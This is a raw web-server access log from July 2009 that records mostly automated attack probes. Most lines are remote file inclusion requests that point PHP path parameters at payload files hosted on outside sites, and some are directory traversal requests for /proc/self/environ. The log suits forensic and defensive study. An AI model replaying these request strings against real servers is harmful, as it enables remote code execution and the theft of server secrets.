59.24.49.35 - - [16/Jul/2009:04:43:19 -0400] "GET /logs/access_log.Q109060100%20%20/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 339 "-" "Mozilla/5.0"
59.24.49.35 - - [16/Jul/2009:04:43:19 -0400] "GET /administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
59.24.49.35 - - [16/Jul/2009:04:43:19 -0400] "GET /logs/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 315 "-" "Mozilla/5.0"
59.24.49.35 - - [16/Jul/2009:04:43:32 -0400] "GET /logs/access_log.Q109052700%20%20/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 339 "-" "Mozilla/5.0"
59.24.49.35 - - [16/Jul/2009:04:43:35 -0400] "GET /logs/access_log.Q109052300/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 337 "-" "Mozilla/5.0"
59.24.49.35 - - [16/Jul/2009:04:43:36 -0400] "GET /logs/access_log.Q109052700/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 337 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:44:34 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
59.24.49.35 - - [16/Jul/2009:04:44:41 -0400] "GET /logs/access_log.Q109052700/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 337 "-" "Mozilla/5.0"
211.189.39.159 - - [16/Jul/2009:04:45:12 -0400] "GET //?_zb_path=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.189.39.159 - - [16/Jul/2009:04:45:12 -0400] "GET /logs/access_log.Q109051100//?_zb_path=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.189.39.159 - - [16/Jul/2009:04:45:12 -0400] "GET /logs//?_zb_path=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 200 9731 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:04:46:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.43.202.66 - - [16/Jul/2009:04:48:12 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
211.43.202.66 - - [16/Jul/2009:04:48:12 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
141.223.5.12 - - [16/Jul/2009:04:48:35 -0400] "GET /administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 299 "-" "libwww-perl/5.79"
72.30.161.230 - - [16/Jul/2009:04:49:44 -0400] "GET /logs/error_log.Q109052700 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.223.143.131 - - [16/Jul/2009:04:50:32 -0400] "GET /?_shop_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:04:50:32 -0400] "GET /logs/?_shop_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 200 9726 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:04:50:33 -0400] "GET /logs/access_log.Q109051100/?_shop_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:04:51:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.223.143.131 - - [16/Jul/2009:04:51:27 -0400] "GET /?_shop_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:04:51:27 -0400] "GET /logs/access_log.Q109051100/?_shop_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:04:51:28 -0400] "GET /logs/?_shop_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 200 9726 "-" "Mozilla/5.0"
141.223.5.12 - - [16/Jul/2009:04:51:31 -0400] "GET /logs/access_log.Q109060100/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 326 "-" "libwww-perl/5.79"
141.223.5.12 - - [16/Jul/2009:04:51:32 -0400] "GET /administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 299 "-" "libwww-perl/5.79"
141.223.5.12 - - [16/Jul/2009:04:51:32 -0400] "GET /logs/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 304 "-" "libwww-perl/5.79"
62.149.163.198 - - [16/Jul/2009:04:51:53 -0400] "GET //solpot.html?body=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 210 "-" "Advanced Browser (http://www.avantbrowser.com)"
62.149.163.198 - - [16/Jul/2009:04:51:53 -0400] "GET /logs/error_log.Q109062000//solpot.html?body=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 236 "-" "Advanced Browser (http://www.avantbrowser.com)"
62.149.163.198 - - [16/Jul/2009:04:51:53 -0400] "GET /logs//solpot.html?body=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 215 "-" "Advanced Browser (http://www.avantbrowser.com)"
62.149.163.198 - - [16/Jul/2009:04:51:54 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.149.163.198 - - [16/Jul/2009:04:51:54 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.149.163.198 - - [16/Jul/2009:04:51:54 -0400] "GET /logs/error_log.Q109062000/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.149.163.198 - - [16/Jul/2009:04:51:54 -0400] "GET /logs//solpot.html?body=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 215 "-" "XXXXXX"
62.149.163.198 - - [16/Jul/2009:04:51:54 -0400] "GET //solpot.html?body=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 210 "-" "XXXXXX"
62.149.163.198 - - [16/Jul/2009:04:51:54 -0400] "GET /logs/error_log.Q109062000//solpot.html?body=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 236 "-" "XXXXXX"
62.149.163.198 - - [16/Jul/2009:04:51:54 -0400] "GET /logs/error_log.Q109062000//solpot.html?body=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "XXXXXX"
62.149.163.198 - - [16/Jul/2009:04:51:54 -0400] "GET /logs//solpot.html?body=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 215 "-" "XXXXXX"
62.149.163.198 - - [16/Jul/2009:04:51:54 -0400] "GET //solpot.html?body=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 210 "-" "XXXXXX"
62.149.163.198 - - [16/Jul/2009:04:52:11 -0400] "GET /logs/error_log.Q109061400//solpot.html?body=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 236 "-" "Advanced Browser (http://www.avantbrowser.com)"
62.149.163.198 - - [16/Jul/2009:04:52:11 -0400] "GET /logs/error_log.Q109061400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.149.163.198 - - [16/Jul/2009:04:52:12 -0400] "GET /logs/error_log.Q109061400//solpot.html?body=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 236 "-" "XXXXXX"
62.149.163.198 - - [16/Jul/2009:04:52:12 -0400] "GET /logs/error_log.Q109061400//solpot.html?body=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "XXXXXX"
218.27.203.107 - - [16/Jul/2009:04:52:43 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.27.203.107 - - [16/Jul/2009:04:52:43 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.27.203.107 - - [16/Jul/2009:04:52:43 -0400] "GET /logs/access_log.Q109061100%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.43.202.66 - - [16/Jul/2009:04:52:52 -0400] "GET //orca/?sIncPath=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 204 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
211.43.202.66 - - [16/Jul/2009:04:52:52 -0400] "GET /logs//orca/?sIncPath=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
74.223.143.131 - - [16/Jul/2009:04:53:07 -0400] "GET /logs/access_log.Q109051100%20%20/?_shop_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.20.159 - - [16/Jul/2009:04:53:15 -0400] "GET /logs/index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 213 "-" "XXXXXX"
94.23.20.159 - - [16/Jul/2009:04:53:15 -0400] "GET /index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 208 "-" "XXXXXX"
94.23.20.159 - - [16/Jul/2009:04:53:15 -0400] "GET /logs/access_log.Q109051500/index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
94.23.20.159 - - [16/Jul/2009:04:53:15 -0400] "GET /logs/index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "XXXXXX"
94.23.20.159 - - [16/Jul/2009:04:53:15 -0400] "GET /logs/access_log.Q109051500/index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
94.23.20.159 - - [16/Jul/2009:04:53:15 -0400] "GET /index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "XXXXXX"
141.223.5.12 - - [16/Jul/2009:04:53:25 -0400] "GET /logs/access_log.Q109052700/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 326 "-" "libwww-perl/5.79"
207.210.126.218 - - [16/Jul/2009:04:53:32 -0400] "GET //bbs/skin/category_04/write.php?dir=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
207.210.126.218 - - [16/Jul/2009:04:53:32 -0400] "GET /logs/access_log.Q109051500//bbs/skin/category_04/write.php?dir=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
207.210.126.218 - - [16/Jul/2009:04:53:32 -0400] "GET /logs//bbs/skin/category_04/write.php?dir=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
207.210.126.218 - - [16/Jul/2009:04:53:41 -0400] "GET /logs/access_log.Q109052100//bbs/skin/category_04/write.php?dir=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
207.210.126.218 - - [16/Jul/2009:04:53:45 -0400] "GET /logs/access_log.Q109051500//bbs/skin/category_04/write.php?dir=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
207.210.126.218 - - [16/Jul/2009:04:53:45 -0400] "GET //bbs/skin/category_04/write.php?dir=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
207.210.126.218 - - [16/Jul/2009:04:53:45 -0400] "GET /logs//bbs/skin/category_04/write.php?dir=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
207.210.126.218 - - [16/Jul/2009:04:53:53 -0400] "GET /logs/access_log.Q109052100//bbs/skin/category_04/write.php?dir=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:04:55:08 -0400] "GET /logs/access_log.Q109051100%20%20/?_shop_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:04:55:14 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:04:55:14 -0400] "GET /logs/access_log.Q109061100/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:04:55:14 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
141.223.5.12 - - [16/Jul/2009:04:55:34 -0400] "GET /logs/access_log.Q109060100/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 341 "-" "libwww-perl/5.79"
141.223.5.12 - - [16/Jul/2009:04:55:35 -0400] "GET /administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 314 "-" "libwww-perl/5.79"
141.223.5.12 - - [16/Jul/2009:04:55:35 -0400] "GET /logs/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 319 "-" "libwww-perl/5.79"
59.24.49.35 - - [16/Jul/2009:04:56:08 -0400] "GET /logs/access_log.Q109052300/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 337 "-" "Mozilla/5.0"
65.55.108.243 - - [16/Jul/2009:04:56:44 -0400] "GET /logs/access_log.Q109032800 HTTP/1.1" 404 224 "-" "Mozilla/4.0"
211.43.202.66 - - [16/Jul/2009:04:56:55 -0400] "GET //orca/?sIncPath=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
211.43.202.66 - - [16/Jul/2009:04:56:55 -0400] "GET /logs//orca/?sIncPath=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
209.59.12.99 - - [16/Jul/2009:04:57:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
141.223.5.12 - - [16/Jul/2009:04:58:18 -0400] "GET /logs/access_log.Q109052700/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 341 "-" "libwww-perl/5.79"
211.43.202.66 - - [16/Jul/2009:04:59:33 -0400] "GET /logs//orca/?sIncPath=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
211.43.202.66 - - [16/Jul/2009:04:59:33 -0400] "GET //orca/?sIncPath=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
218.27.203.107 - - [16/Jul/2009:05:00:20 -0400] "GET /logs/access_log.Q109061100/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:05:01:03 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:05:01:03 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:05:01:03 -0400] "GET /logs/access_log.Q109061100%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
207.210.126.218 - - [16/Jul/2009:05:01:34 -0400] "GET /logs/access_log.Q109051500%20%20//bbs/skin/category_04/write.php?dir=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
207.210.126.218 - - [16/Jul/2009:05:01:35 -0400] "GET /logs/access_log.Q109051500%20%20//bbs/skin/category_04/write.php?dir=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
207.210.126.218 - - [16/Jul/2009:05:01:38 -0400] "GET /logs/access_log.Q109052100%20%20//bbs/skin/category_04/write.php?dir=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
207.210.126.218 - - [16/Jul/2009:05:01:39 -0400] "GET /logs/access_log.Q109052100%20%20//bbs/skin/category_04/write.php?dir=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
110.45.138.139 - - [16/Jul/2009:05:03:11 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://fritzcomforthomes.com/copyme.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
110.45.138.139 - - [16/Jul/2009:05:03:11 -0400] "GET //?path%5Bdocroot%5D=http://fritzcomforthomes.com/copyme.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
110.45.138.139 - - [16/Jul/2009:05:03:11 -0400] "GET /logs//?path%5Bdocroot%5D=http://fritzcomforthomes.com/copyme.txt??? HTTP/1.1" 200 9731 "-" "Mozilla/5.0"
110.45.138.139 - - [16/Jul/2009:05:03:21 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://fritzcomforthomes.com/copyme.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.43.202.66 - - [16/Jul/2009:05:04:34 -0400] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
211.43.202.66 - - [16/Jul/2009:05:04:34 -0400] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
209.59.12.99 - - [16/Jul/2009:05:04:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.138.139 - - [16/Jul/2009:05:05:19 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://fritzcomforthomes.com/copyme.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
110.45.138.139 - - [16/Jul/2009:05:05:19 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://fritzcomforthomes.com/copyme.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:05:05:52 -0400] "GET /logs/access_log.Q109061100/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
117.74.99.225 - - [16/Jul/2009:05:06:40 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.porn-free.org/Devotions/images/fx29id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
117.74.99.225 - - [16/Jul/2009:05:06:40 -0400] "GET /logs/access_log.Q109070800/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.porn-free.org/Devotions/images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
117.74.99.225 - - [16/Jul/2009:05:06:40 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.porn-free.org/Devotions/images/fx29id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.43.202.66 - - [16/Jul/2009:05:07:01 -0400] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
211.43.202.66 - - [16/Jul/2009:05:07:01 -0400] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
211.236.242.164 - - [16/Jul/2009:05:07:07 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:05:07:07 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:05:07:07 -0400] "GET /logs/access_log.Q109070800/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
207.210.89.18 - - [16/Jul/2009:05:07:28 -0400] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.811"
207.210.89.18 - - [16/Jul/2009:05:07:28 -0400] "GET /logs/access_log.Q109061600/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.811"
207.210.89.18 - - [16/Jul/2009:05:07:28 -0400] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
211.236.242.164 - - [16/Jul/2009:05:07:39 -0400] "GET /logs/access_log.Q109062400/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
207.210.89.18 - - [16/Jul/2009:05:08:02 -0400] "GET /logs/access_log.Q109070700/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.811"
62.146.47.98 - - [16/Jul/2009:05:08:48 -0400] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
62.146.47.98 - - [16/Jul/2009:05:08:48 -0400] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
62.146.47.98 - - [16/Jul/2009:05:08:48 -0400] "GET /logs/access_log.Q109061600/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
117.74.99.225 - - [16/Jul/2009:05:09:04 -0400] "GET /logs/access_log.Q109062400/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.porn-free.org/Devotions/images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
62.146.47.98 - - [16/Jul/2009:05:09:10 -0400] "GET /logs/error_log.Q109061600/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
218.246.20.221 - - [16/Jul/2009:05:09:11 -0400] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=9&Itemid=26&vmcchk=1&Itemid=http://piffopuff.se/images/stories//test.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
218.246.20.221 - - [16/Jul/2009:05:09:11 -0400] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=9&Itemid=26&vmcchk=1&Itemid=http://piffopuff.se/images/stories//test.txt??? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
218.27.203.107 - - [16/Jul/2009:05:09:24 -0400] "GET /logs/access_log.Q109061600/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
218.27.203.107 - - [16/Jul/2009:05:09:24 -0400] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
218.27.203.107 - - [16/Jul/2009:05:09:24 -0400] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
218.27.203.107 - - [16/Jul/2009:05:09:39 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.27.203.107 - - [16/Jul/2009:05:09:40 -0400] "GET /logs/access_log.Q109070800%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.27.203.107 - - [16/Jul/2009:05:09:40 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
